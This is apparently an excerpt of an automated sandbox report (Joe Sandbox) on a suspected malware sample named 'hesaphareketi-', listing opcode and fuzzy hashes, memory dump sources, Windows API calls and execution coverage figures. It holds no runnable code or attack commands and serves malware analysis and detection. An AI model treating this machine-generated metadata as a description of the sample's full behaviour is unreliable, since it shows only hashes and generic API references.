                                            • Opcode ID: 711d2d1a3f9dcc741c201759af288ba92d83299b1e267de9e7b4ff0d3caf871e
                                            • Instruction ID: 87e38fee0d2cec82400ac56511f4f3e360192bd1bf2c713f2bf97ab3994db994
                                            • Opcode Fuzzy Hash: 711d2d1a3f9dcc741c201759af288ba92d83299b1e267de9e7b4ff0d3caf871e
                                            • Instruction Fuzzy Hash: B5D16F35A1121A8FDB14DFB9D980AADB7F2FFC8305F158669D406EB354DB34A902CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \s]q
                                            • API String ID: 0-3728726972
                                            • Opcode ID: ee51f4d699270e1920cadd3dc58c5c8be11240a865015a48a86d6538e2647335
                                            • Instruction ID: c41e6e3af1b5465b0caa275a4e860dd03396bc52ccdfd8f503c1ef74239370ed
                                            • Opcode Fuzzy Hash: ee51f4d699270e1920cadd3dc58c5c8be11240a865015a48a86d6538e2647335
                                            • Instruction Fuzzy Hash: A5913B78E4020E9FDF14CFA9D585AAEBBF1FF89300F10A665D402EB291DB31A941CB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c357034fb60946d4e6879c889c05c8f213ac5402358abe0552b99f11ba68e508
                                            • Instruction ID: 59b9a7a1faab96e9ffb9c7fb7d06f655a54cd66da1f965ffaa50e68493055c26
                                            • Opcode Fuzzy Hash: c357034fb60946d4e6879c889c05c8f213ac5402358abe0552b99f11ba68e508
                                            • Instruction Fuzzy Hash: 07819E32F101259FD714EB69D880A9EB7E7AFC8715F1AC079E44ADB365DA30EC018B80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dd0351e45eb4ff0de8d87676a52f94932ffed7878126d1d3d5b23aae88540c5
                                            • Instruction ID: 11d69b082a5d09dd984f48ae39dc4e7a55e6be46a730f63ecc014883a94f558d
                                            • Opcode Fuzzy Hash: 1dd0351e45eb4ff0de8d87676a52f94932ffed7878126d1d3d5b23aae88540c5
                                            • Instruction Fuzzy Hash: 23615E32F105259FD714EB69C880A9EB3E7AFC8714F1AC179E4499B365DE70EC028B91

                                            Control-flow Graph
                                            • Blocks 229d469-229d645, entry block 229d469-229d507; API calls in graph: GetCurrentProcess (229d469-229d507), GetCurrentThread (229d510-229d544), GetCurrentProcess (229d54d-229d581), GetCurrentThreadId (229d5ab-229d5da); call to 229d648 from block 229d58a-229d5a5
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0229D4F6
                                            • GetCurrentThread.KERNEL32 ref: 0229D533
                                            • GetCurrentProcess.KERNEL32 ref: 0229D570
                                            • GetCurrentThreadId.KERNEL32 ref: 0229D5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 28845269ceecaf0ef7821965c5fe1018a4c13d4541bb2741180fadd3893ff7c0
                                            • Instruction ID: 41bd283be1a92d6e7841365651cc76c9fcc0eac155db7575506103b55ae06739
                                            • Opcode Fuzzy Hash: 28845269ceecaf0ef7821965c5fe1018a4c13d4541bb2741180fadd3893ff7c0
                                            • Instruction Fuzzy Hash: 455169B09003498FDB14EFA9D648BAEBFF1EF48304F208469D419A7365D739A944CF65

                                            Control-flow Graph
                                            • Blocks 229d478-229d645, entry block 229d478-229d507; API calls in graph: GetCurrentProcess (229d478-229d507), GetCurrentThread (229d510-229d544), GetCurrentProcess (229d54d-229d581), GetCurrentThreadId (229d5ab-229d5da); call to 229d648 from block 229d58a-229d5a5
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0229D4F6
                                            • GetCurrentThread.KERNEL32 ref: 0229D533
                                            • GetCurrentProcess.KERNEL32 ref: 0229D570
                                            • GetCurrentThreadId.KERNEL32 ref: 0229D5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: de8a1ef8af5a2677d7ffeaf9d5a65be0faf4911fb5e49ac0a9b446553d1180af
                                            • Instruction ID: bc96a028db0eeecd4f3c17b6191a53a8d00b2cff74125157ff73694cc3726c17
                                            • Opcode Fuzzy Hash: de8a1ef8af5a2677d7ffeaf9d5a65be0faf4911fb5e49ac0a9b446553d1180af
                                            • Instruction Fuzzy Hash: 21515AB09003498FDB14EFAAD648B9EBBF5FF48304F208469D019A7365D739A944CF65

                                            Control-flow Graph
                                            • Blocks 229b1f0-229b470, entry block 229b1f0-229b1ff; API call in graph: GetModuleHandleW (229b428-229b453); calls to 229abc4, 229b478 / 229b488, 229abd0, 229abe0, 229b779 / 229b788, 229abf0 and 229ac00
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0229B446
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: de31daf30702046a87fceea1beb1655a657290cf6c056c5571f2924e9ee052d1
                                            • Instruction ID: 619b8304f127b21973e2cc0c4b6052ecd88a319526bbba14b0f504678df82bc1
                                            • Opcode Fuzzy Hash: de31daf30702046a87fceea1beb1655a657290cf6c056c5571f2924e9ee052d1
                                            • Instruction Fuzzy Hash: 7F714670A10B058FDB24DFA9E05475ABBF5FF88304F00892DD44ADBA54D775E945CB90

                                            Control-flow Graph
                                            • Blocks 49b1ce4-49b1e61, entry block 49b1ce4-49b1d56; API call in graph: CreateWindowExW (49b1db3-49b1e12); final block 49b1e61 branches to itself
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049B1E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 0a63e1312ad2c36613a05779469e8c7a0f6c9de575ed1d5e2dce6d623ac94b48
                                            • Instruction ID: 80fae1895c114a11edde47f1d4239935f8b871724943b6713f5889b0a1002028
                                            • Opcode Fuzzy Hash: 0a63e1312ad2c36613a05779469e8c7a0f6c9de575ed1d5e2dce6d623ac94b48
                                            • Instruction Fuzzy Hash: 9251C0B1D00349DFDF14CF99C985ADEBBB6BF48350F24812AE819AB210D775A845CF90

                                            Control-flow Graph
                                            • Blocks 49b1cf0-49b1e61, entry block 49b1cf0-49b1d56; API call in graph: CreateWindowExW (49b1d73-49b1e12); final block 49b1e61 branches to itself
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049B1E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: a45a3b49e7b78e907dce34456fe53839ac073b5fbcbc9d353cbb2f2041b8898c
                                            • Instruction ID: 8f39b566c3e46cb94797972876a31968e569a99a4f96d591bd9cfaa05abc3e73
                                            • Opcode Fuzzy Hash: a45a3b49e7b78e907dce34456fe53839ac073b5fbcbc9d353cbb2f2041b8898c
                                            • Instruction Fuzzy Hash: 7841B0B1D00309DFDF14CF99C995ADEBBB5BF88350F24812AE819AB210D775A945CF90

                                            Control-flow Graph
                                            • Blocks 49b0bfc-49b43dc, entry block 49b0bfc-49b42fc; API call in graph: CallWindowProcW (49b435a-49b4392); call to 49b0ad4 from block 49b43ac-49b43cc
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 049B4381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 0faaaa4944401647f111990f4d2488a0254ac3f58ae4d7e09962de80c3d3bc05
                                            • Instruction ID: 583cc320c1ab43b5890023fd6ae6e01e2c89724978ef766573851c7806d5a233
                                            • Opcode Fuzzy Hash: 0faaaa4944401647f111990f4d2488a0254ac3f58ae4d7e09962de80c3d3bc05
                                            • Instruction Fuzzy Hash: 2F4129B4A00309DFDB14CF99C548AAABBF5FF88314F24C469D559A7321D375A841DBA0

                                            Control-flow Graph
                                            • Blocks 22947c4-2295e19, entry block 22947c4-2295d91 containing CreateActCtxA; final block 2295e19 branches to itself
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02295D81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: f48c5b34a170022b652a1915c4ec859046156b9da87e7bfa7e2b865720a53417
                                            • Instruction ID: e70c85371f0fe3852f48a2caab53060952e52d52de9d5d345473584cafc2dbd1
                                            • Opcode Fuzzy Hash: f48c5b34a170022b652a1915c4ec859046156b9da87e7bfa7e2b865720a53417
                                            • Instruction Fuzzy Hash: CB41EFB0D0061DCBDF25DFA9C948B9EBBF5BF48304F20806AD418AB258DB756949CF91
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02295D81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 4c8f753d4ce5c14ed12ee51382baaa19b8c2664872ecfa4880dda008442e5c1b
                                            • Instruction ID: a829ba144ed6c8d728629f1831b498355899cb075c8ae72d1b317aca2bd6286e
                                            • Opcode Fuzzy Hash: 4c8f753d4ce5c14ed12ee51382baaa19b8c2664872ecfa4880dda008442e5c1b
                                            • Instruction Fuzzy Hash: 2C41E0B0D00619CFDF25DFA9C988ACDBBF5BF48304F20806AD418AB255DB75694ACF91
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0229D747
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 0ad698f9c15771ba1d00ad333c4e04d216ab018b9cfcd1ad90b7939e7d43a8d5
                                            • Instruction ID: fe2fe090585e30d75278c1328bdfdbb2d74a30614464c791de459560d336a91e
                                            • Opcode Fuzzy Hash: 0ad698f9c15771ba1d00ad333c4e04d216ab018b9cfcd1ad90b7939e7d43a8d5
                                            • Instruction Fuzzy Hash: 642103B59002499FDB10CF9AD984ADEBFF4FB48320F10801AE918A7350C379A941CFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0229D747
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 574a80f379c340a9549f10cec7858f152a31465fc260a5717301df01ed8db883
                                            • Instruction ID: d0994baaedca3f4bce37fb59796338a492e49c08c6975a8d043ddb2e3bf4d20e
                                            • Opcode Fuzzy Hash: 574a80f379c340a9549f10cec7858f152a31465fc260a5717301df01ed8db883
                                            • Instruction Fuzzy Hash: 9821E4B59002089FDF10CF9AD984ADEBBF9FB48310F14801AE918A3310C379A940CFA1
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0229B4C1,00000800,00000000,00000000), ref: 0229B6D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 3c91161e41389ec9b57f9593d339c5b38edc2c1d2686d8d11cfb0021af9f8bd1
                                            • Instruction ID: 7b5a8428e89cbfc93cc824c7633970a66cd31dd69bd42edb29b99c463e74b1b7
                                            • Opcode Fuzzy Hash: 3c91161e41389ec9b57f9593d339c5b38edc2c1d2686d8d11cfb0021af9f8bd1
                                            • Instruction Fuzzy Hash: 511114B69002098FDF10DF9AD884ADEFBF4EF48314F10842ED529A7240C379A546CFA5
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0229B4C1,00000800,00000000,00000000), ref: 0229B6D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 6539afabf73250978617cdfe01448ea26374c265ed75184c914bb61ec8c860a7
                                            • Instruction ID: 5d1544a19bc6e86bcf64f2e4d052d5023d6b512d50f266586ffadf4cf7b74db2
                                            • Opcode Fuzzy Hash: 6539afabf73250978617cdfe01448ea26374c265ed75184c914bb61ec8c860a7
                                            • Instruction Fuzzy Hash: A01114B69003099FDF10DF9AD444A9EFBF4EB48314F10842ED519A7200C379A944CFA4
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0229B446
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 81d5a4928a3e6f84e2ad278b8f55266145aba54f7151ae2ea07a1d14a3fc1138
                                            • Instruction ID: 54f1ed412c6639f0f1b8615b1e2e703b50244d88fd0f01d20d6be6472e69e1ee
                                            • Opcode Fuzzy Hash: 81d5a4928a3e6f84e2ad278b8f55266145aba54f7151ae2ea07a1d14a3fc1138
                                            • Instruction Fuzzy Hash: 68110FB5C002498FDB10DF9AD444A9EFBF4AF89314F10845AD829A7200C379A545CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2d9c767fae3d0d72825bfe0ddef469edd6e39c85c6d6ee1e2591205744a0622
                                            • Instruction ID: 5ad45c3ee9dc6e8b08ba1d95b182293d0e8133139eedcbbb9b3a1b7bb3f34d0d
                                            • Opcode Fuzzy Hash: f2d9c767fae3d0d72825bfe0ddef469edd6e39c85c6d6ee1e2591205744a0622
                                            • Instruction Fuzzy Hash: AF21F1B2500244DFCF059F54D9C0F26BFA5FB98314F2486B9E9490B256C33AD816DBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 188ec556da449c4216e4bdf9760740196442f0f9be4f84a45becc8696b622bdd
                                            • Instruction ID: 4980369224cdac06f9e8fa352ff074a5bb6f056db41539ef737f45ebc2e2314c
                                            • Opcode Fuzzy Hash: 188ec556da449c4216e4bdf9760740196442f0f9be4f84a45becc8696b622bdd
                                            • Instruction Fuzzy Hash: 8921FF71500240DFDF05DF14D9C0B26BFA5FBA8318F20C5B9E9090B266C33AD816DBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
                                            • Instruction ID: eff49fffa30d6cf41ae87b146dd37947e36621e36e40b4bd36967efb60652c6f
                                            • Opcode Fuzzy Hash: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
                                            • Instruction Fuzzy Hash: 8B21F271608204DFCB24DF24D9D4B26BFA5FB89314F20C5ADD94A4B696C33AD807CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
                                            • Instruction ID: c848d6b452d025359c6a2c0db689c1f4b2925d14815c411b9c5b92abba289861
                                            • Opcode Fuzzy Hash: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
                                            • Instruction Fuzzy Hash: B9210471608304EFDB05DF24D9C0F26BBA5FB89314F20C5ADE90A4B696C33AD806CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
                                            • Instruction ID: 4708b0af4a2130720381ad75ac8aeeb6fcf444bceeff7f6079d8b8ec41e57e4b
                                            • Opcode Fuzzy Hash: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
                                            • Instruction Fuzzy Hash: 302184755093808FDB16CF24D594715BFB1EB46314F28C5DAD8498B697C33AD80ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction ID: 11a66d7429030ba8dd63af470ccf8dbf92787ca28257738a104963e675bf0b79
                                            • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction Fuzzy Hash: C821A276504280DFCF06CF54D9C4B16BFB2FB98314F24C6A9D9490B256C33AD816DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: ace71402e105f9dddcc2f422a0b7b7c31ca1df7c4b9a3aea44e16a4aaf4c25bc
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: DF11D376504280CFCF16CF14D5C4B16BFB1FBA8314F24C6A9D9494B656C336D85ACBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 3f987c55742dddc642ccde5cec8584f1eeb0b034def6ca6e4324491dc3d654f4
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: CE118B75508380DFDB16CF14D5C4B15BBA1FB85314F24C6A9D84A4B6A6C33AD84ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41a2820e55120b2cb063358ce13bf9a4abde43f6510b62efe922172fd960fdc1
                                            • Instruction ID: c68cda7ddd7c9cefbc2faf74330e35b77ae8bf1788a5129b78c562e8a7c2087c
                                            • Opcode Fuzzy Hash: 41a2820e55120b2cb063358ce13bf9a4abde43f6510b62efe922172fd960fdc1
                                            • Instruction Fuzzy Hash: D401FC310043409ADF208A5BCDC4756BFDCEF55320F14C4BAED091A257C23D9C00C671
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29cafa0aa826aa2cbf4aba5efe77502e01e1b7d3f45ee65bb4526d2259618c59
                                            • Instruction ID: e4a6beec61cb9e572c5c3b4ac8a95daac72b383e20b647a6b5ce16a47a0cd266
                                            • Opcode Fuzzy Hash: 29cafa0aa826aa2cbf4aba5efe77502e01e1b7d3f45ee65bb4526d2259618c59
                                            • Instruction Fuzzy Hash: 74F06271405344AEEB108E1ADDC4B62FFE8EF55774F18C4AAED485A287C2799844CAB1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 64095b9c0977c8800c1117f1a9aa0902ab411edd7f5fde0a24d813eed1352436
                                            • Instruction ID: a31ef1a44fd3e6e001badd2eee510237514eb552257cdedc732960e2571a35bb
                                            • Opcode Fuzzy Hash: 64095b9c0977c8800c1117f1a9aa0902ab411edd7f5fde0a24d813eed1352436
                                            • Instruction Fuzzy Hash: 7D51CD35B101058FCB14DF6DD9805AEBBF6FBC8219B14857AE509DB359EB34EC028B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7feabb5198623c674cb025ee6966c1c6d28ca36e66344f266fa9c5da877a4fb
                                            • Instruction ID: 139b1ec2540eb52dda203a7bcae1f785575fe6f9fc6f3248ab3ff64772641ad9
                                            • Opcode Fuzzy Hash: d7feabb5198623c674cb025ee6966c1c6d28ca36e66344f266fa9c5da877a4fb
                                            • Instruction Fuzzy Hash: 7212B4B0D817468AD752DFA5F84C1893BB2BB85319FD04B09E2612F2E5DBB8117ACF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c915dcc96bd6c21bf766f5438ca8ad3c4420fb04e11d6e985865015083dbe355
                                            • Instruction ID: 1e0c02656dd653d3a557ee4b63b3540fb5a453b29eef843991a129c540cbe134
                                            • Opcode Fuzzy Hash: c915dcc96bd6c21bf766f5438ca8ad3c4420fb04e11d6e985865015083dbe355
                                            • Instruction Fuzzy Hash: F0A14B32E2030A8FCF09DFB4C9445AEB7B2FF85304B15456AE805AB269DB31E956CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ced9efdc3995f821f9be560784d16e7f7b46de2523c24d0c98be56193ae30e0
                                            • Instruction ID: c6f04ba177be0ea60b206eea2b782233cc7e1e0779a640bb01e2f146b2c50b19
                                            • Opcode Fuzzy Hash: 4ced9efdc3995f821f9be560784d16e7f7b46de2523c24d0c98be56193ae30e0
                                            • Instruction Fuzzy Hash: F6C115B0C817468BD712DFA5F84C1897BB2BB85319F944B09E2616F2E1DBB8147ACF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd58152184546d209f528e3398f8c0cfb90805994913d766714576f70e996f22
                                            • Instruction ID: 040bf1a41fc56b2750ae55b18c038560543e140dd885a49121b71d00c96567af
                                            • Opcode Fuzzy Hash: dd58152184546d209f528e3398f8c0cfb90805994913d766714576f70e996f22
                                            • Instruction Fuzzy Hash: 0C411478E5111E9FDF14CFA9E9819EDF3B2BF89304B14E215E016EB295DA31A801CB44

                                            Execution Graph

                                             Execution Coverage: 8.9%
                                             Dynamic/Decrypted Code Coverage: 100%
                                             Signature Coverage: 0%
                                             Total number of Nodes: 45
                                             Total number of Limit Nodes: 8
